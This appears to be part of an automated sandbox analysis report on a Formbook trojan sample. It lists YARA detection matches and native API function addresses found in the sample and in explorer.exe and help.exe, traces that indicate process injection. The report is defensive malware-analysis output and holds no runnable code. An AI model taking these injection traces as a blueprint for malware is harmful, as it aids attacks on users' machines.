                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7548, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7656, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: help.exe PID: 7700, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041A360 NtCreateFile,2_2_0041A360
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041A410 NtReadFile,2_2_0041A410
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041A490 NtClose,2_2_0041A490
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041A31D NtCreateFile,2_2_0041A31D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041A40A NtReadFile,2_2_0041A40A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041A53A NtAllocateVirtualMemory,2_2_0041A53A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01A32BF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32B60 NtClose,LdrInitializeThunk,2_2_01A32B60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32AD0 NtReadFile,LdrInitializeThunk,2_2_01A32AD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01A32DF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32DD0 NtDelayExecution,LdrInitializeThunk,2_2_01A32DD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01A32D30
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01A32D10
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_01A32CA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01A32C70
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32FB0 NtResumeThread,LdrInitializeThunk,2_2_01A32FB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01A32F90
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32FE0 NtCreateFile,LdrInitializeThunk,2_2_01A32FE0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32F30 NtCreateSection,LdrInitializeThunk,2_2_01A32F30
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01A32EA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_01A32E80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A34340 NtSetContextThread,2_2_01A34340
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A34650 NtSuspendThread,2_2_01A34650
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32BA0 NtEnumerateValueKey,2_2_01A32BA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32B80 NtQueryInformationFile,2_2_01A32B80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32BE0 NtQueryValueKey,2_2_01A32BE0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32AB0 NtWaitForSingleObject,2_2_01A32AB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32AF0 NtWriteFile,2_2_01A32AF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32DB0 NtEnumerateKey,2_2_01A32DB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32D00 NtSetInformationFile,2_2_01A32D00
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32CF0 NtOpenProcess,2_2_01A32CF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32CC0 NtQueryVirtualMemory,2_2_01A32CC0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32C00 NtQueryInformationProcess,2_2_01A32C00
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32C60 NtCreateKey,2_2_01A32C60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32FA0 NtQuerySection,2_2_01A32FA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32F60 NtCreateProcessEx,2_2_01A32F60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32EE0 NtQueueApcThread,2_2_01A32EE0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32E30 NtWriteVirtualMemory,2_2_01A32E30
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A33090 NtSetValueKey,2_2_01A33090
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A33010 NtOpenDirectoryObject,2_2_01A33010
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A335C0 NtCreateMutant,2_2_01A335C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A339B0 NtGetContextThread,2_2_01A339B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A33D10 NtOpenProcessToken,2_2_01A33D10
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A33D70 NtOpenThread,2_2_01A33D70
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF0F232 NtCreateFile,3_2_0DF0F232
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF10E12 NtProtectVirtualMemory,3_2_0DF10E12
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF10E0A NtProtectVirtualMemory,3_2_0DF10E0A
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332B60 NtClose,LdrInitializeThunk,4_2_03332B60
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03332BF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03332BE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332AD0 NtReadFile,LdrInitializeThunk,4_2_03332AD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332F30 NtCreateSection,LdrInitializeThunk,4_2_03332F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332FE0 NtCreateFile,LdrInitializeThunk,4_2_03332FE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_03332EA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03332D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03332DF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332DD0 NtDelayExecution,LdrInitializeThunk,4_2_03332DD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03332C70
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332C60 NtCreateKey,LdrInitializeThunk,4_2_03332C60
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03332CA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033335C0 NtCreateMutant,LdrInitializeThunk,4_2_033335C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03334340 NtSetContextThread,4_2_03334340
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03334650 NtSuspendThread,4_2_03334650
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332BA0 NtEnumerateValueKey,4_2_03332BA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332B80 NtQueryInformationFile,4_2_03332B80
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332AB0 NtWaitForSingleObject,4_2_03332AB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332AF0 NtWriteFile,4_2_03332AF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332F60 NtCreateProcessEx,4_2_03332F60
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332FB0 NtResumeThread,4_2_03332FB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332FA0 NtQuerySection,4_2_03332FA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332F90 NtProtectVirtualMemory,4_2_03332F90
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332E30 NtWriteVirtualMemory,4_2_03332E30
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332E80 NtReadVirtualMemory,4_2_03332E80
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332EE0 NtQueueApcThread,4_2_03332EE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332D30 NtUnmapViewOfSection,4_2_03332D30
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332D00 NtSetInformationFile,4_2_03332D00
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332DB0 NtEnumerateKey,4_2_03332DB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332C00 NtQueryInformationProcess,4_2_03332C00
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332CF0 NtOpenProcess,4_2_03332CF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03332CC0 NtQueryVirtualMemory,4_2_03332CC0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03333010 NtOpenDirectoryObject,4_2_03333010
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03333090 NtSetValueKey,4_2_03333090
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033339B0 NtGetContextThread,4_2_033339B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03333D10 NtOpenProcessToken,4_2_03333D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03333D70 NtOpenThread,4_2_03333D70
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294A360 NtCreateFile,4_2_0294A360
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294A490 NtClose,4_2_0294A490
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294A410 NtReadFile,4_2_0294A410
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294A540 NtAllocateVirtualMemory,4_2_0294A540
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294A31D NtCreateFile,4_2_0294A31D
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294A40A NtReadFile,4_2_0294A40A
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294A53A NtAllocateVirtualMemory,4_2_0294A53A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 0_2_00A4D4840_2_00A4D484
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_004010302_2_00401030
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041D8822_2_0041D882
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041E1542_2_0041E154
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041EB762_2_0041EB76
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_00402D892_2_00402D89
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_00402D902_2_00402D90
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041E59D2_2_0041E59D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_00409E5B2_2_00409E5B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_00409E602_2_00409E60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_00402FB02_2_00402FB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC01AA2_2_01AC01AA
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB41A22_2_01AB41A2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB81CC2_2_01AB81CC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F01002_2_019F0100
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9A1182_2_01A9A118
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A881582_2_01A88158
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A920002_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC03E62_2_01AC03E6
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E3F02_2_01A0E3F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABA3522_2_01ABA352
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A802C02_2_01A802C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA02742_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC05912_2_01AC0591
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A005352_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAE4F62_2_01AAE4F6
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA44202_2_01AA4420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB24462_2_01AB2446
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FC7C02_2_019FC7C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A007702_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A247502_2_01A24750
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1C6E02_2_01A1C6E0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A02_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ACA9A62_2_01ACA9A6
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A169622_2_01A16962
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E68B82_2_019E68B8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E8F02_2_01A2E8F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0A8402_2_01A0A840
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A028402_2_01A02840
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB6BD72_2_01AB6BD7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABAB402_2_01ABAB40
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA802_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A18DBF2_2_01A18DBF
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FADE02_2_019FADE0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0AD002_2_01A0AD00
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9CD1F2_2_01A9CD1F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0CB52_2_01AA0CB5
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0CF22_2_019F0CF2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00C002_2_01A00C00
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7EFA02_2_01A7EFA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0CFE02_2_01A0CFE0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F2FC82_2_019F2FC8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A42F282_2_01A42F28
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A20F302_2_01A20F30
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA2F302_2_01AA2F30
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A74F402_2_01A74F40
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12E902_2_01A12E90
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABCE932_2_01ABCE93
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABEEDB2_2_01ABEEDB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABEE262_2_01ABEE26
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00E592_2_01A00E59
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0B1B02_2_01A0B1B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ACB16B2_2_01ACB16B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A3516C2_2_01A3516C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EF1722_2_019EF172
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB70E92_2_01AB70E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABF0E02_2_01ABF0E0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A070C02_2_01A070C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAF0CC2_2_01AAF0CC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A4739A2_2_01A4739A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB132D2_2_01AB132D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019ED34C2_2_019ED34C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A052A02_2_01A052A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA12ED2_2_01AA12ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1B2C02_2_01A1B2C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9D5B02_2_01A9D5B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB75712_2_01AB7571
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABF43F2_2_01ABF43F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F14602_2_019F1460
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABF7B02_2_01ABF7B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB16CC2_2_01AB16CC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A959102_2_01A95910
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A099502_2_01A09950
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1B9502_2_01A1B950
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A038E02_2_01A038E0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6D8002_2_01A6D800
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1FB802_2_01A1FB80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A75BF02_2_01A75BF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A3DBF92_2_01A3DBF9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABFB762_2_01ABFB76
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A45AA02_2_01A45AA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9DAAC2_2_01A9DAAC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA1AA32_2_01AA1AA3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AADAC62_2_01AADAC6
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A73A6C2_2_01A73A6C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABFA492_2_01ABFA49
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB7A462_2_01AB7A46
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1FDC02_2_01A1FDC0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB7D732_2_01AB7D73
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A03D402_2_01A03D40
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB1D5A2_2_01AB1D5A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABFCF22_2_01ABFCF2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A79C322_2_01A79C32
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABFFB12_2_01ABFFB1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A01F922_2_01A01F92
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABFF092_2_01ABFF09
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A09EB02_2_01A09EB0
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE275CD3_2_0DE275CD
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE1BD023_2_0DE1BD02
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE219123_2_0DE21912
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE1A0823_2_0DE1A082
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE230363_2_0DE23036
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE1EB303_2_0DE1EB30
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE1EB323_2_0DE1EB32
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE242323_2_0DE24232
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF0F2323_2_0DF0F232
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF125CD3_2_0DF125CD
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF09B303_2_0DF09B30
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF09B323_2_0DF09B32
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF0C9123_2_0DF0C912
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF06D023_2_0DF06D02
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF050823_2_0DF05082
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF0E0363_2_0DF0E036
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BA3524_2_033BA352
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0330E3F04_2_0330E3F0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033C03E64_2_033C03E6
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033A02744_2_033A0274
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033802C04_2_033802C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0339A1184_2_0339A118
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032F01004_2_032F0100
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033881584_2_03388158
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033C01AA4_2_033C01AA
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B41A24_2_033B41A2
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B81CC4_2_033B81CC
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033920004_2_03392000
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033007704_2_03300770
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033247504_2_03324750
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032FC7C04_2_032FC7C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0331C6E04_2_0331C6E0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033005354_2_03300535
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033C05914_2_033C0591
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033A44204_2_033A4420
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B24464_2_033B2446
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033AE4F64_2_033AE4F6
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BAB404_2_033BAB40
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B6BD74_2_033B6BD7
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032FEA804_2_032FEA80
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033169624_2_03316962
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033029A04_2_033029A0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033CA9A64_2_033CA9A6
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0330A8404_2_0330A840
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033028404_2_03302840
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032E68B84_2_032E68B8
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0332E8F04_2_0332E8F0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03320F304_2_03320F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033A2F304_2_033A2F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03342F284_2_03342F28
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03374F404_2_03374F40
